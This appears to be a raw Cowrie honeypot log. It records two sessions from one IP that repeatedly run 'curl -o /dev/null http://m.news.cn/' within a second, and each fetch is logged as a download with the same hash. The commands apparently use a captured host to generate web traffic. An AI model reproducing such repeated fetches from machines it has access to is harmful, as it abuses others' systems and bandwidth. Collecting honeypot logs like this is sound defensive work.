{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.262326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.269911Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.271323Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.290887Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.302227Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.304600Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.310075Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.311227Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.313373Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.344960Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.346458Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.350262Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.352632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.355673Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.375745Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.386929Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.388328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.392277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.394430Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.407026Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.412186Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.415880Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.431661Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.432964Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.436523Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.437517Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.440565Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.451025Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.475209Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.476520Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.479009Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.479862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.487797Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.510390Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.512274Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.515857Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.516958Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.519285Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.520326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.523252Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.543538Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.559579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.560802Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.564891Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.567147Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.568143Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.602391Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.603383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.609291Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.610191Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.625423Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.638719Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.639576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.648311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.649157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.654548Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.669400Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.676324Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.677189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.685971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.686766Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.703490Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.705205Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.713154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.714090Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.725764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.726791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.733701Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.753007Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.754858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.764219Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.766213Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.767090Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.776070Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.790623Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.793941Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.795247Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.798462Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.801465Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.805018Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.805856Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.830221Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.831165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.844627Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.845560Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.860164Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
